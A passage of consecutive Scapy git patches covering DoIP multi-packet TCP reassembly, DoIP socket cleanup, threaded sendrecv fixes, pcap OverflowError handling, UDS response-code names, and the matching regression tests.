2 deletions(-) diff --git a/scapy/arch/linux/__init__.py b/scapy/arch/linux/__init__.py index 03dc3e7d9cf..ec1f2f480e2 100644 --- a/scapy/arch/linux/__init__.py +++ b/scapy/arch/linux/__init__.py @@ -142,8 +142,6 @@ def attach_filter(sock, bpf_filter, iface): def set_promisc(s, iff, val=1): # type: (socket.socket, _GlobInterfaceType, int) -> None _iff = resolve_iface(iff) - if not _iff.is_valid(): - raise OSError("set_promisc: Unknown interface %s" % iff) mreq = struct.pack("IHH8s", _iff.index, PACKET_MR_PROMISC, 0, b"") if val: cmd = PACKET_ADD_MEMBERSHIP From 45c216f1350b03f254939cb861fda5b92e8c25bf Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Sat, 7 Sep 2024 22:46:59 +0200 Subject: [PATCH 1363/1632] Fix #4472: Add ability to parse multiple DoIP packets in one TCP pkt (#4515) * Fix #4472: Add ability to parse multiple DoIP packets in one TCP packet via TCPSession * update * When not in app mode, tcp_reassemble sub-packets --------- Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/contrib/automotive/doip.py | 6 +++--- scapy/sessions.py | 26 +++++++++++++++++++----- test/contrib/automotive/doip.uts | 11 ++++++++++ test/pcaps/multiple_doip_layers.pcap.gz | Bin 0 -> 206 bytes 4 files changed, 35 insertions(+), 8 deletions(-) create mode 100644 test/pcaps/multiple_doip_layers.pcap.gz diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index 60b304638ba..fe514b9811b 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -257,15 +257,15 @@ def post_build(self, pkt, pay): def extract_padding(self, s): # type: (bytes) -> Tuple[bytes, Optional[bytes]] if self.payload_type == 0x8001: - return s[:self.payload_length - 4], None + return s[:self.payload_length - 4], s[self.payload_length - 4:] else: - return b"", None + return b"", s @classmethod def tcp_reassemble(cls, data, metadata, session): # type: (bytes, Dict[str, Any], Dict[str, Any]) -> Optional[Packet] length = struct.unpack("!I", data[4:8])[0] + 8 - if len(data) == length: + if len(data) >= length: return DoIP(data) return None diff --git a/scapy/sessions.py b/scapy/sessions.py index 01e005505e5..be95b769353 100644 --- a/scapy/sessions.py +++ b/scapy/sessions.py @@ -367,11 +367,22 @@ def process(self, metadata.clear() # Check for padding padding = self._strip_padding(packet) - if padding: + while padding: # There is remaining data for the next payload. full_length = data.content_len - len(padding) metadata["relative_seq"] = relative_seq + full_length data.shiftleft(full_length) + # There might be a sub-payload hidden in the padding + sub_packet = tcp_reassemble( + bytes(data), + metadata, + tcp_session + ) + if sub_packet: + packet /= sub_packet + padding = self._strip_padding(sub_packet) + else: + break else: # No padding (data) left. Clear data.clear() @@ -397,10 +408,15 @@ def recv(self, sock: 'SuperSocket') -> Iterator[Packet]: """ pkt = sock.recv(stop_dissection_after=self.stop_dissection_after) # Now handle TCP reassembly - while pkt is not None: - pkt = self.process(pkt) + if self.app: + while pkt is not None: + pkt = self.process(pkt) + if pkt: + yield pkt + # keep calling process as there might be more + pkt = b"" # type: ignore + else: + pkt = self.process(pkt) # type: ignore if pkt: yield pkt - # keep calling process as there might be more - pkt = b"" # type: ignore return None diff --git a/test/contrib/automotive/doip.uts b/test/contrib/automotive/doip.uts index 161b9b3df19..b246b542191 100644 --- a/test/contrib/automotive/doip.uts +++ b/test/contrib/automotive/doip.uts @@ -394,6 +394,17 @@ pkts = sniff(offline=tmp_file, session=TCPSession) assert pkts[0].haslayer(UDS_TP) assert pkts[0].service == 0x3E += TCPSession Test multiple DoIP messages + +filename = scapy_path("/test/pcaps/multiple_doip_layers.pcap.gz") + +pkts = sniff(offline=filename, session=TCPSession) +print(repr(pkts[0])) +print(repr(pkts[1])) +assert len(pkts) == 2 +assert pkts[0][DoIP].payload_length == 2 +assert pkts[0][DoIP:2].payload_length == 7 +assert pkts[1][DoIP].payload_length == 103 + DoIP Communication tests diff --git a/test/pcaps/multiple_doip_layers.pcap.gz b/test/pcaps/multiple_doip_layers.pcap.gz new file mode 100644 index 0000000000000000000000000000000000000000..79302b2bc76b30c320966de0843fd954d1b64bdb GIT binary patch literal 206 zcmV;<05Sg`iwFqhd7@?j18sF|bZKyGWnW}(X>ea`VR>b8b1raWVQ>Jua(L51CI%J; z1Yluc1d_9+u1~3AW?=AVfZ$cT&)gN@1Cb2O91N}u435l(4h#-#OOy|+;A943{sYV= z5gd~bN2M43*d8Fk!myy7fr05S0|!tu6F-pE05X=HpFu!W$)pivyru{P!%_wah8PU7 z1Z@2DwpAeG6+*y91FbNLIKT`v`Uud9;sA+XPQR=eV1}j(i1ITenKUxc6qqyu0K2Ek I^DF@X07)!T&j0`b literal 0 HcmV?d00001 From 1464fa9c7c4c3f830b6965cfbc54df8d693f1b86 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sun, 8 Sep 2024 13:24:07 +0300 Subject: [PATCH 1364/1632] tests: replace the LDAP OSS-Fuzz testcase (#4530) The original testcase triggers a separate issue on 32-bit machines: https://github.com/secdev/scapy/issues/4527 and it should probably be tested separately. The new testcase triggers the issue fixed in 1935723c18b45b0a735d9e44ca80a0d4976a5bb9 only: ```sh >>> assert l[0][LDAP].summary() == "LDAP" Traceback (most recent call last): File "", line 2, in File "scapy/scapy/packet.py", line 1692, in summary return self._do_summary()[1] ^^^^^^^^^^^^^^^^^^ File "scapy/scapy/packet.py", line 1669, in _do_summary ret = self.mysummary() ^^^^^^^^^^^^^^^^ File "scapy/scapy/layers/ldap.py", line 736, in mysummary self.messageID.val, ^^^^^^^^^^^^^^^^^^ AttributeError: 'NoneType' object has no attribute 'val' ``` --- test/regression.uts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/test/regression.uts b/test/regression.uts index 09296a0b141..ec557509c2e 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2339,7 +2339,7 @@ file = BytesIO(b"\n\r\r\n\x00\x00\x008\x1a+ Date: Wed, 11 Sep 2024 10:08:10 +0200 Subject: [PATCH 1365/1632] Catch OverflowError (#4529) --- scapy/utils.py | 9 ++++++++- test/regression.uts | 5 +++++ 2 files changed, 13 insertions(+), 1 deletion(-) diff --git a/scapy/utils.py b/scapy/utils.py index f36e5bd681a..9710d36eefd 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1500,7 +1500,14 @@ def _read_packet(self, size=MTU): if len(hdr) < 16: raise EOFError sec, usec, caplen, wirelen = struct.unpack(self.endian + "IIII", hdr) - return (self.f.read(caplen)[:size], + + try: + data = self.f.read(caplen)[:size] + except OverflowError as e: + warning(f"Pcap: {e}") + raise EOFError + + return (data, RawPcapReader.PacketMetadata(sec=sec, usec=usec, wirelen=wirelen, caplen=caplen)) diff --git a/test/regression.uts b/test/regression.uts index ec557509c2e..1612bda7422 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2343,6 +2343,11 @@ file = BytesIO(b"\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x0 l = rdpcap(file) assert l[0][LDAP].summary() == "LDAP" +# Issue #69628 - 32-bit alternative +file = BytesIO(b'\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00\x01\x00\x00\x00%\xa8\xddfK\x1b\x05\x00\xca\xca\xca\xca*\x00\x00\x00\xff\xff\xff\xff\xff\xff\x86"\x11&\xab3\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01]\x80\x0f\x13*r\n\x00\x02\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +l = rdpcap(file) +assert len(l) == 0 or ARP in l[0] + = Read a pcap file with wirelen != captured len pktpcapwirelen = rdpcap(pcapwirelenfile) From 30b0398863cb0f54a1988b7e42f63c3cd5b5d506 Mon Sep 17 00:00:00 2001 From: Benedikt Wagner Date: Thu, 12 Sep 2024 16:21:08 +0200 Subject: [PATCH 1366/1632] Changes to be committed: (#4522) modified: ../scapy/contrib/automotive/uds.py added descriptions for NRC 0x50-0x5D Co-authored-by: bwagner --- scapy/contrib/automotive/uds.py | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index 67a7bb59e52..97ebcdc4daf 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -1454,6 +1454,20 @@ class UDS_NR(Packet): 0x36: 'exceedNumberOfAttempts', 0x37: 'requiredTimeDelayNotExpired', 0x3A: 'secureDataVerificationFailed', + 0x50: 'certificateVerificationFailedInvalidTimePeriod', + 0x51: 'certificateVerificationFailedInvalidSignature', + 0x52: 'certificateVerificationFailedInvalidChainOfTrust', + 0x53: 'certificateVerificationFailedInvalidType', + 0x54: 'certificateVerificationFailedInvalidFormat', + 0x55: 'certificateVerificationFailedInvalidContent', + 0x56: 'certificateVerificationFailedInvalidScope', + 0x57: 'certificateVerificationFailedInvalidCertificateRevoked', + 0x58: 'ownershipVerificationFailed', + 0x59: 'challengeCalculationFailed', + 0x5a: 'settingAccessRightsFailed', + 0x5b: 'sessionKeyCreationOrDerivationFailed', + 0x5c: 'configurationDataUsageFailed', + 0x5d: 'deAuthenticationFailed', 0x70: 'uploadDownloadNotAccepted', 0x71: 'transferDataSuspended', 0x72: 'generalProgrammingFailure', From 19eeafef1768bfc7624bc2b69c6815d1fb49ad65 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 23 Sep 2024 15:50:10 +0200 Subject: [PATCH 1367/1632] Cleanup DoIP sockets (#4533) * Cleanup DoIP sockets * change get_addr_info --- scapy/contrib/automotive/doip.py | 101 +++---------------------------- test/contrib/automotive/doip.uts | 8 +-- 2 files changed, 14 insertions(+), 95 deletions(-) diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index fe514b9811b..b9d279bcf6b 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -39,7 +39,7 @@ ) from scapy.layers.inet import TCP, UDP from scapy.packet import Packet, bind_layers, bind_bottom_up -from scapy.supersocket import StreamSocket, SSLStreamSocket +from scapy.supersocket import SSLStreamSocket # ISO 13400-2 sect 9.2 @@ -361,21 +361,23 @@ def __init__(self, self.force_tls = force_tls self.context = context try: - self._init_socket(socket.AF_INET) + self._init_socket() except Exception: self.close() raise - def _init_socket(self, sock_family=socket.AF_INET): - # type: (int) -> None + def _init_socket(self): + # type: () -> None connected = False + addrinfo = socket.getaddrinfo(self.ip, self.port, proto=socket.IPPROTO_TCP) + sock_family = addrinfo[0][0] + s = socket.socket(sock_family, socket.SOCK_STREAM) s.settimeout(5) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) if not self.force_tls: - addrinfo = socket.getaddrinfo(self.ip, self.port, proto=socket.IPPROTO_TCP) s.connect(addrinfo[0][-1]) connected = True DoIPSSLStreamSocket.__init__(self, s) @@ -450,66 +452,7 @@ def _activate_routing(self): # type: (...) -> int return -1 -class DoIPSocket6(DoIPSocket): - """Socket for DoIP communication. This sockets automatically - sends a routing activation request as soon as a TCP or TLS connection is - established. - - :param ip: IPv6 address of destination - :param port: destination port, usually 13400 - :param tls_port: destination port for TLS connection, usually 3496 - :param activate_routing: If true, routing activation request is - automatically sent - :param source_address: DoIP source address - :param target_address: DoIP target address, this is automatically - determined if routing activation request is sent - :param activation_type: This allows to set a different activation type for - the routing activation request - :param reserved_oem: Optional parameter to set value for reserved_oem field - of routing activation request - :param force_tls: Skip establishing of a TCP connection and directly try to - connect via SSL/TLS - :param context: Optional ssl.SSLContext object for initialization of ssl socket - connections. - - Example: - >>> socket = DoIPSocket6("2001:16b8:3f0e:2f00:21a:37ff:febf:edb9") - >>> socket_link_local = DoIPSocket6("fe80::30e8:80ff:fe07:6d43%eth1") - >>> pkt = DoIP(payload_type=0x8001, source_address=0xe80, target_address=0x1000) / UDS() / UDS_RDBI(identifiers=[0x1000]) - >>> resp = socket.sr1(pkt, timeout=1) - """ # noqa: E501 - - def __init__(self, - ip='::1', # type: str - port=13400, # type: int - tls_port=3496, # type: int - activate_routing=True, # type: bool - source_address=0xe80, # type: int - target_address=0, # type: int - activation_type=0, # type: int - reserved_oem=b"", # type: bytes - force_tls=False, # type: bool - context=None # type: Optional[ssl.SSLContext] - ): # type: (...) -> None - self.ip = ip - self.port = port - self.tls_port = tls_port - self.activate_routing = activate_routing - self.source_address = source_address - self.target_address = target_address - self.activation_type = activation_type - self.reserved_oem = reserved_oem - self.buffer = b"" - self.force_tls = force_tls - self.context = context - try: - self._init_socket(socket.AF_INET6) - except Exception: - self.close() - raise - - -class _UDS_DoIPSocketBase(StreamSocket): +class UDS_DoIPSocket(DoIPSocket): """ Application-Layer socket for DoIP endpoints. This socket takes care about the encapsulation of UDS packets into DoIP packets. @@ -524,8 +467,8 @@ def send(self, x): # type: (Union[Packet, bytes]) -> int if isinstance(x, UDS): pkt = DoIP(payload_type=0x8001, - source_address=self.source_address, # type: ignore - target_address=self.target_address # type: ignore + source_address=self.source_address, + target_address=self.target_address ) / x else: pkt = x @@ -545,28 +488,4 @@ def recv(self, x=MTU, **kwargs): else: return pkt - -class UDS_DoIPSocket(_UDS_DoIPSocketBase, DoIPSocket): - """ - Application-Layer socket for DoIP endpoints. This socket takes care about - the encapsulation of UDS packets into DoIP packets. - - Example: - >>> socket = UDS_DoIPSocket("169.254.117.238") - >>> pkt = UDS() / UDS_RDBI(identifiers=[0x1000]) - >>> resp = socket.sr1(pkt, timeout=1) - """ - pass - - -class UDS_DoIPSocket6(_UDS_DoIPSocketBase, DoIPSocket6): - """ - Application-Layer socket for DoIP endpoints. This socket takes care about - the encapsulation of UDS packets into DoIP packets. - - Example: - >>> socket = UDS_DoIPSocket6("2001:16b8:3f0e:2f00:21a:37ff:febf:edb9") - >>> pkt = UDS() / UDS_RDBI(identifiers=[0x1000]) - >>> resp = socket.sr1(pkt, timeout=1) - """ pass diff --git a/test/contrib/automotive/doip.uts b/test/contrib/automotive/doip.uts index b246b542191..7f4467c6d76 100644 --- a/test/contrib/automotive/doip.uts +++ b/test/contrib/automotive/doip.uts @@ -528,7 +528,7 @@ def server(): server_thread = threading.Thread(target=server) server_thread.start() server_up.wait(timeout=1) -sock = DoIPSocket6(activate_routing=False) +sock = DoIPSocket(ip="::1", activate_routing=False) pkts = sock.sniff(timeout=1, count=2) server_thread.join(timeout=1) @@ -668,7 +668,7 @@ server_up.wait(timeout=1) context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) context.check_hostname = False context.verify_mode = ssl.CERT_NONE -sock = DoIPSocket6(activate_routing=False, force_tls=True, context=context) +sock = DoIPSocket(ip="::1", activate_routing=False, force_tls=True, context=context) pkts = sock.sniff(timeout=1, count=2) server_thread.join(timeout=1) @@ -705,7 +705,7 @@ server_up.wait(timeout=1) context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) context.check_hostname = False context.verify_mode = ssl.CERT_NONE -sock = UDS_DoIPSocket6(activate_routing=False, force_tls=True, context=context) +sock = UDS_DoIPSocket(ip="::1", activate_routing=False, force_tls=True, context=context) pkts = sock.sniff(timeout=1, count=2) server_thread.join(timeout=1) @@ -765,7 +765,7 @@ context.check_hostname = False context.verify_mode = ssl.CERT_NONE -sock = UDS_DoIPSocket6(ip="::1", context=context) +sock = UDS_DoIPSocket(ip="::1", context=context) pkts = sock.sniff(timeout=1, count=2) server_tcp_thread.join(timeout=1) From da9a952f2ac9e0dc7566842b142b9308e2ab188b Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 24 Sep 2024 13:25:10 +0200 Subject: [PATCH 1368/1632] Fix threaded sendrecv (#4538) * Restore sndrcv behaviour from before 53afe84 * Fix possible race condition of sndrcv * Use much better timeout for threading * Reduce abuse on public servers * fix doip unit tests * add testcase * fix test case * fix unit tests * fix unit tests * fix unit tests * fix unit tests --------- Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/sendrecv.py | 41 ++++++++++--------- test/contrib/automotive/doip.uts | 36 +++++++++++----- .../contrib/automotive/scanner/enumerator.uts | 12 ++++++ test/regression.uts | 6 +-- test/sendsniff.uts | 39 ++++++++++++++++++ test/testsocket.py | 26 +++++++++++- 6 files changed, 125 insertions(+), 35 deletions(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index 18775d50291..4f06c19d443 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -92,7 +92,7 @@ class debug: Automatically enabled when a generator is passed as the packet :param _flood: :param threaded: if True, packets are sent in a thread and received in another. - defaults to False. + Defaults to True. :param session: a flow decoder used to handle stream of packets :param chainEX: if True, exceptions during send will be forwarded :param stop_filter: Python function applied to each packet to determine if @@ -128,7 +128,7 @@ def __init__(self, rcv_pks=None, # type: Optional[SuperSocket] prebuild=False, # type: bool _flood=None, # type: Optional[_FloodGenerator] - threaded=False, # type: bool + threaded=True, # type: bool session=None, # type: Optional[_GlobSessionType] chainEX=False, # type: bool stop_filter=None # type: Optional[Callable[[Packet], bool]] @@ -158,7 +158,7 @@ def __init__(self, self.noans = 0 self._flood = _flood self.threaded = threaded - self.breakout = False + self.breakout = Event() # Instantiate packet holders if prebuild and not self._flood: self.tobesent = list(pkt) # type: _PacketIterable @@ -174,6 +174,7 @@ def __init__(self, self.timeout = None while retry >= 0: + self.breakout.clear() self.hsent = {} # type: Dict[bytes, List[Packet]] if threaded or self._flood: @@ -190,7 +191,7 @@ def __init__(self, except KeyboardInterrupt as ex: interrupted = ex - self.breakout = True + self.breakout.set() # Ended. Let's close gracefully if self._flood: @@ -251,6 +252,12 @@ def results(self): # type: () -> Tuple[SndRcvList, PacketList] return self.ans_result, self.unans_result + def _stop_sniffer_if_done(self) -> None: + """Close the sniffer if all expected answers have been received""" + if self._send_done and self.noans >= self.notans and not self.multi: + if self.sniffer and self.sniffer.running: + self.sniffer.stop(join=False) + def _sndrcv_snd(self): # type: () -> None """Function used in the sending thread of sndrcv()""" @@ -258,7 +265,7 @@ def _sndrcv_snd(self): p = None try: if self.verbose: - print("Begin emission:") + os.write(1, b"Begin emission\n") for p in self.tobesent: # Populate the dictionary of _sndrcv_rcv # _sndrcv_rcv won't miss the answer of a packet that @@ -266,13 +273,12 @@ def _sndrcv_snd(self): self.hsent.setdefault(p.hashret(), []).append(p) # Send packet self.pks.send(p) - if self.inter: - time.sleep(self.inter) - if self.breakout: + time.sleep(self.inter) + if self.breakout.is_set(): break i += 1 if self.verbose: - print("Finished sending %i packets." % i) + os.write(1, b"\nFinished sending %i packets\n" % i) except SystemExit: pass except Exception: @@ -291,13 +297,10 @@ def _sndrcv_snd(self): elif not self._send_done: self.notans = i self._send_done = True - # In threaded mode, timeout. - if self.threaded and self.timeout is not None and not self.breakout: - t = time.monotonic() + self.timeout - while time.monotonic() < t: - if self.breakout: - break - time.sleep(0.1) + self._stop_sniffer_if_done() + # In threaded mode, timeout + if self.threaded and self.timeout is not None and not self.breakout.is_set(): + self.breakout.wait(timeout=self.timeout) if self.sniffer and self.sniffer.running: self.sniffer.stop() @@ -324,9 +327,7 @@ def _process_packet(self, r): self.noans += 1 sentpkt._answered = 1 break - if self._send_done and self.noans >= self.notans and not self.multi: - if self.sniffer and self.sniffer.running: - self.sniffer.stop(join=False) + self._stop_sniffer_if_done() if not ok: if self.verbose > 1: os.write(1, b".") @@ -342,7 +343,7 @@ def _sndrcv_rcv(self, callback): self.sniffer = AsyncSniffer() self.sniffer._run( prn=self._process_packet, - timeout=None if self.threaded else self.timeout, + timeout=None if self.threaded and not self._flood else self.timeout, store=False, opened_socket=self.rcv_pks, session=self.session, diff --git a/test/contrib/automotive/doip.uts b/test/contrib/automotive/doip.uts index 7f4467c6d76..9a7d61e3b7d 100644 --- a/test/contrib/automotive/doip.uts +++ b/test/contrib/automotive/doip.uts @@ -416,6 +416,7 @@ import tempfile = Test DoIPSocket server_up = threading.Event() +sniff_up = threading.Event() def server(): buffer = b'\x02\xfd\x80\x02\x00\x00\x00\x05\x00\x00\x00\x00\x00\x02\xfd\x80\x01\x00\x00\x00\n\x10\x10\x0e\x80P\x03\x002\x01\xf4' sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) @@ -426,6 +427,7 @@ def server(): sock.listen(1) server_up.set() connection, address = sock.accept() + sniff_up.wait(timeout=1) connection.send(buffer) connection.close() finally: @@ -437,7 +439,7 @@ server_thread.start() server_up.wait(timeout=1) sock = DoIPSocket(activate_routing=False) -pkts = sock.sniff(timeout=1, count=2) +pkts = sock.sniff(timeout=1, count=2, started_callback=sniff_up.set) server_thread.join(timeout=1) assert len(pkts) == 2 @@ -446,6 +448,7 @@ assert len(pkts) == 2 ~ linux server_up = threading.Event() +sniff_up = threading.Event() def server(): buffer = b'\x02\xfd\x80\x02\x00\x00\x00\x05\x00\x00\x00\x00\x00\x02\xfd\x80\x01\x00\x00\x00\n\x10\x10\x0e\x80P\x03\x002\x01\xf4' sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) @@ -456,6 +459,7 @@ def server(): sock.listen(1) server_up.set() connection, address = sock.accept() + sniff_up.wait(timeout=1) for i in range(len(buffer)): connection.send(buffer[i:i+1]) time.sleep(0.01) @@ -469,13 +473,14 @@ server_thread.start() server_up.wait(timeout=1) sock = DoIPSocket(activate_routing=False) -pkts = sock.sniff(timeout=1, count=2) +pkts = sock.sniff(timeout=1, count=2, started_callback=sniff_up.set) server_thread.join(timeout=1) assert len(pkts) == 2 = Test DoIPSocket 3 server_up = threading.Event() +sniff_up = threading.Event() def server(): buffer = b'\x02\xfd\x80\x02\x00\x00\x00\x05\x00\x00\x00\x00\x00\x02\xfd\x80\x01\x00\x00\x00\n\x10\x10\x0e\x80P\x03\x002\x01\xf4' sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) @@ -486,6 +491,7 @@ def server(): sock.listen(1) server_up.set() connection, address = sock.accept() + sniff_up.wait(timeout=1) while buffer: randlen = random.randint(0, len(buffer)) connection.send(buffer[:randlen]) @@ -501,7 +507,7 @@ server_thread.start() server_up.wait(timeout=1) sock = DoIPSocket(activate_routing=False) -pkts = sock.sniff(timeout=1, count=2) +pkts = sock.sniff(timeout=1, count=2, started_callback=sniff_up.set) server_thread.join(timeout=1) assert len(pkts) == 2 @@ -509,6 +515,7 @@ assert len(pkts) == 2 = Test DoIPSocket6 server_up = threading.Event() +sniff_up = threading.Event() def server(): buffer = b'\x02\xfd\x80\x02\x00\x00\x00\x05\x00\x00\x00\x00\x00\x02\xfd\x80\x01\x00\x00\x00\n\x10\x10\x0e\x80P\x03\x002\x01\xf4' sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) @@ -519,6 +526,7 @@ def server(): sock.listen(1) server_up.set() connection, address = sock.accept() + sniff_up.wait(timeout=1) connection.send(buffer) connection.close() finally: @@ -530,7 +538,7 @@ server_thread.start() server_up.wait(timeout=1) sock = DoIPSocket(ip="::1", activate_routing=False) -pkts = sock.sniff(timeout=1, count=2) +pkts = sock.sniff(timeout=1, count=2, started_callback=sniff_up.set) server_thread.join(timeout=1) assert len(pkts) == 2 @@ -604,6 +612,7 @@ def _load_certificate_chain(context) -> None: server_up = threading.Event() +sniff_up = threading.Event() def server(): context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) _load_certificate_chain(context) @@ -619,6 +628,7 @@ def server(): ssock.listen(1) server_up.set() connection, address = ssock.accept() + sniff_up.wait(timeout=1) connection.send(buffer) connection.close() finally: @@ -633,7 +643,7 @@ context.check_hostname = False context.verify_mode = ssl.CERT_NONE sock = DoIPSocket(activate_routing=False, force_tls=True, context=context) -pkts = sock.sniff(timeout=1, count=2) +pkts = sock.sniff(timeout=1, count=2, started_callback=sniff_up.set) server_thread.join(timeout=1) assert len(pkts) == 2 @@ -641,6 +651,7 @@ assert len(pkts) == 2 ~ broken_windows server_up = threading.Event() +sniff_up = threading.Event() def server(): context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) _load_certificate_chain(context) @@ -656,6 +667,7 @@ def server(): ssock.listen(1) server_up.set() connection, address = ssock.accept() + sniff_up.wait(timeout=1) connection.send(buffer) connection.close() finally: @@ -670,7 +682,7 @@ context.check_hostname = False context.verify_mode = ssl.CERT_NONE sock = DoIPSocket(ip="::1", activate_routing=False, force_tls=True, context=context) -pkts = sock.sniff(timeout=1, count=2) +pkts = sock.sniff(timeout=1, count=2, started_callback=sniff_up.set) server_thread.join(timeout=1) assert len(pkts) == 2 @@ -678,6 +690,7 @@ assert len(pkts) == 2 ~ broken_windows server_up = threading.Event() +sniff_up = threading.Event() def server(): context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) _load_certificate_chain(context) @@ -693,6 +706,7 @@ def server(): ssock.listen(1) server_up.set() connection, address = ssock.accept() + sniff_up.wait(timeout=1) connection.send(buffer) connection.close() finally: @@ -707,15 +721,16 @@ context.check_hostname = False context.verify_mode = ssl.CERT_NONE sock = UDS_DoIPSocket(ip="::1", activate_routing=False, force_tls=True, context=context) -pkts = sock.sniff(timeout=1, count=2) +pkts = sock.sniff(timeout=1, count=2, started_callback=sniff_up.set) server_thread.join(timeout=1) assert len(pkts) == 2 = Test UDS_DualDoIPSslSocket6 -~ broken_windows +~ broken_windows not_pypy server_tcp_up = threading.Event() server_tls_up = threading.Event() +sniff_up = threading.Event() def server_tls(): context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER) _load_certificate_chain(context) @@ -732,6 +747,7 @@ def server_tls(): ssock.listen(1) server_tls_up.set() connection, address = ssock.accept() + sniff_up.wait(timeout=1) connection.send(buffer) connection.close() finally: @@ -748,7 +764,7 @@ def server_tcp(): server_tcp_up.set() connection, address = sock.accept() connection.send(buffer) - connection.shutdown() + connection.shutdown(socket.SHUT_RDWR) connection.close() finally: sock.close() @@ -767,7 +783,7 @@ context.verify_mode = ssl.CERT_NONE sock = UDS_DoIPSocket(ip="::1", context=context) -pkts = sock.sniff(timeout=1, count=2) +pkts = sock.sniff(timeout=1, count=2, started_callback=sniff_up.set) server_tcp_thread.join(timeout=1) server_tls_thread.join(timeout=1) assert len(pkts) == 2 diff --git a/test/contrib/automotive/scanner/enumerator.uts b/test/contrib/automotive/scanner/enumerator.uts index 70f725a51ce..b1ac0cc8716 100644 --- a/test/contrib/automotive/scanner/enumerator.uts +++ b/test/contrib/automotive/scanner/enumerator.uts @@ -219,7 +219,19 @@ class MockISOTPSocket(SuperSocket): return len(sx) @staticmethod def select(sockets, remain=None): + time.sleep(0) return sockets + def sr(self, *args, **kargs): + from scapy import sendrecv + return sendrecv.sndrcv(self, *args, threaded=False, **kargs) + def sr1(self, *args, **kargs): + from scapy import sendrecv + ans = sendrecv.sndrcv(self, *args, threaded=False, **kargs)[0] # type: SndRcvList + if len(ans) > 0: + pkt = ans[0][1] # type: Packet + return pkt + else: + return None sock = MockISOTPSocket() sock.rcvd_queue.put(b"\x41") diff --git a/test/regression.uts b/test/regression.uts index 1612bda7422..bddaf06315d 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1832,7 +1832,7 @@ sck = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ssck = StreamSocket(sck) try: - r = ssck.sr1(ICMP(type='echo-request'), timeout=0.1, chainEX=True) + r = ssck.sr1(ICMP(type='echo-request'), timeout=0.1, chainEX=True, threaded=False) assert False except Exception: assert True @@ -2132,7 +2132,7 @@ retry_test(_test) ~ netaccess needs_root IP ICMP def _test(): packet = IP(dst="8.8.8.8")/ICMP() - r = srflood(packet, timeout=2) + r = srflood(packet, timeout=0.5) assert packet.sent_time is not None retry_test(_test) @@ -2142,7 +2142,7 @@ retry_test(_test) def _test(): packet1 = IP(dst="8.8.8.8")/ICMP() packet2 = IP(dst="8.8.4.4")/ICMP() - r = srflood([packet1, packet2], timeout=2) + r = srflood([packet1, packet2], timeout=0.5) assert packet1.sent_time is not None assert packet2.sent_time is not None diff --git a/test/sendsniff.uts b/test/sendsniff.uts index 1a2ed99c4a5..4a69695f666 100644 --- a/test/sendsniff.uts +++ b/test/sendsniff.uts @@ -395,3 +395,42 @@ finally: e = os.system("ip netns del blob1") conf.ifaces.reload() conf.route.resync() + + += sr() performance test +~ linux needs_root veth not_pypy + +import subprocess +import shlex + +try: + # Create a dedicated network name space to simulate remote host + subprocess.check_call(shlex.split("sudo ip netns add scapy")) + # Create a virtual Ethernet pair to connect default and new NS + subprocess.check_call(shlex.split("sudo ip link add type veth")) + # Move veth1 to the new NS + subprocess.check_call(shlex.split("sudo ip link set veth1 netns scapy")) + # Setup vNIC in the default NS + subprocess.check_call(shlex.split("sudo ip link set veth0 up")) + subprocess.check_call(shlex.split("sudo ip addr add 192.168.168.1/24 dev veth0")) + # Setup vNIC in the dedicated NS + subprocess.check_call(shlex.split("sudo ip netns exec scapy ip link set lo up")) + subprocess.check_call(shlex.split("sudo ip netns exec scapy ip link set veth1 up")) + subprocess.check_call(shlex.split("sudo ip netns exec scapy ip addr add 192.168.168.2/24 dev veth1")) + # Perform test + conf.route.resync() + res, unansw = sr(IP(dst='192.168.168.2') / ICMP(seq=(1, 1000)), timeout=1, verbose=False) +finally: + try: + # Bring down the interfaces + subprocess.check_call(shlex.split("sudo ip netns exec scapy ip link set veth1 down")) + subprocess.check_call(shlex.split("sudo ip netns exec scapy ip link set lo down")) + # Delete the namespace + subprocess.check_call(shlex.split("sudo ip netns delete scapy")) + # Remove the virtual Ethernet pair + subprocess.check_call(shlex.split("sudo ip link delete veth0")) + except subprocess.CalledProcessError as e: + print(f"Error during cleanup: {e}") + +len(res) == 1000 + diff --git 